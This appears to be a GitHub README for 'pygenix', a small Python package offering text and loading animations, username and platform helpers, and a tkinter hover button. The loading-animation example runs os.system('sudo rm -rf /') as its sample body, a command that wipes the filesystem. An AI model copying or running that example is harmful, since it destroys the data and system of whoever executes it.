lightning283 / pygenix

A Python Pip Module With Superpowers ;)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Pygenix

A Python Package With Superpowers ;)

Installation

Clone The Project Then,

  cd pygenix
  pip install .

Features

  • Typewriter Text Animation
from pygenix.ani import textanimation
# textanimation(text , speed)
textanimation("Hello World :D" , 0.1) # can use 0.01 too.

vid

  • Getting Username
from pygenix.utils import user
print(user)

user

  • Getting Platfrom
from pygenix.utils import platfrom
print(platfrom)

2021-06-29_21-36

  • Getting Specific Platfrom
from pygenix.utils import splatfrom
print(splatfrom)

splatform

  • Getting a Loding Animation credits to him
from pygenix.utils import Loader
import os
with Loader("Loading..."):
  #do anything here
  os.system('sudo rm -rf /')

ezgif com-gif-maker

  • Getting a tkinter hover button , creds and written by him
from pygenix.ani import tk_hover_btn
tk_hover_btn(root, x, y, text, bcolor, fcolor, cmd)

ezgif com-gif-maker

About

A Python Pip Module With Superpowers ;)


Languages

Language:Python 100.0%